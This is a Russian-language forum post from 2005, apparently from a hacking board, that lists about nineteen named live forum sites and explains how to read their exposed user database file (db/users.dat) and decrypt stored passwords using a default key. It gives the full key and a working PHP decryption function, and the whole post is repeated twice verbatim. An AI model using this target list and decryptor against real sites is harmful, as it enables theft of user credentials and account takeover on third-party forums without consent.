Егорыч+++
09.01.2005, 01:01
Данная уязвимость найдена на этих сайтах.
http://www.johnnyhollow.com/forum
http://www.laurenpowers.com/forums/
http://lugaversa.altervista.org/forum
http://www.avenueq.com/forum/
http://forum.kyrenee.com
http://www.fsjames.com/ultimate
http://www.ohiospeedskatingtour.com/forum/
http://sta.umbc.edu/orgs/sail/pages/forum
http://www.mpcs.ryerson.ca/~research/ (http://www.mpcs.ryerson.ca/%7Eresearch/)
http://www.primednr.com/upb/
http://www.killerdwarfs.net/messageboard/
http://www.stompchat.com/forum/
http://www.yeclaserve.com/forum/
http://users.aber.ac.uk/trc99/forum
http://www.bus.sfu.ca/clubs/BASS/BAM
http://waitz.dnsalias.org/upb/
http://www.hunggakungfu.com/forum/
http://www.diskusjonsforum.com
http://www.trek.dp.ua/forum
1) Файлы с пользователями можно смотреть. Например:
http://www.johnnyhollow.com/forum/db/users.dat
2) Пароли пользователя можно дешифровать . Ключ везде стоит по умолчанию.
Функция дешифрования:
<?
$key="wdnyyjinffnruxezrkowkjmtqhvrxvolqqxokuofoqtneltaom owpkfvmmogbayankrnrhmbduzfmpctxiidweripxwglmwrmdsc oqyijpkzqqzsuqapfkoshhrtfsssmcfzuffzsfxdwupkzvqnlo ubrvwzmsxjuoluhatqqyfbyfqonvaosminsxpjqebcuiqggccl";
function t_decrypt($text, $key)
{
$crypt = "";
for($i=0;$i<strlen($text);$i++)
{
$i_key = ord(substr($key, $i, 1));
$i_text = ord(substr($text, $i, 1));
$n_key = ord(substr($key, $i+1, 1));
$i_crypt = $i_text + $n_key;
$i_crypt = $i_crypt - $i_key;
$crypt .= chr($i_crypt);
}
return $crypt;
}
$text="тут пароль для дешифрации";
echo t_decrypt($text, $key);
?>
http://www.johnnyhollow.com/forum
http://www.laurenpowers.com/forums/
http://lugaversa.altervista.org/forum
http://www.avenueq.com/forum/
http://forum.kyrenee.com
http://www.fsjames.com/ultimate
http://www.ohiospeedskatingtour.com/forum/
http://sta.umbc.edu/orgs/sail/pages/forum
http://www.mpcs.ryerson.ca/~research/ (http://www.mpcs.ryerson.ca/%7Eresearch/)
http://www.primednr.com/upb/
http://www.killerdwarfs.net/messageboard/
http://www.stompchat.com/forum/
http://www.yeclaserve.com/forum/
http://users.aber.ac.uk/trc99/forum
http://www.bus.sfu.ca/clubs/BASS/BAM
http://waitz.dnsalias.org/upb/
http://www.hunggakungfu.com/forum/
http://www.diskusjonsforum.com
http://www.trek.dp.ua/forum
1) Файлы с пользователями можно смотреть. Например:
http://www.johnnyhollow.com/forum/db/users.dat
2) Пароли пользователя можно дешифровать . Ключ везде стоит по умолчанию.
Функция дешифрования:
<?
$key="wdnyyjinffnruxezrkowkjmtqhvrxvolqqxokuofoqtneltaom owpkfvmmogbayankrnrhmbduzfmpctxiidweripxwglmwrmdsc oqyijpkzqqzsuqapfkoshhrtfsssmcfzuffzsfxdwupkzvqnlo ubrvwzmsxjuoluhatqqyfbyfqonvaosminsxpjqebcuiqggccl";
function t_decrypt($text, $key)
{
$crypt = "";
for($i=0;$i<strlen($text);$i++)
{
$i_key = ord(substr($key, $i, 1));
$i_text = ord(substr($text, $i, 1));
$n_key = ord(substr($key, $i+1, 1));
$i_crypt = $i_text + $n_key;
$i_crypt = $i_crypt - $i_key;
$crypt .= chr($i_crypt);
}
return $crypt;
}
$text="тут пароль для дешифрации";
echo t_decrypt($text, $key);
?>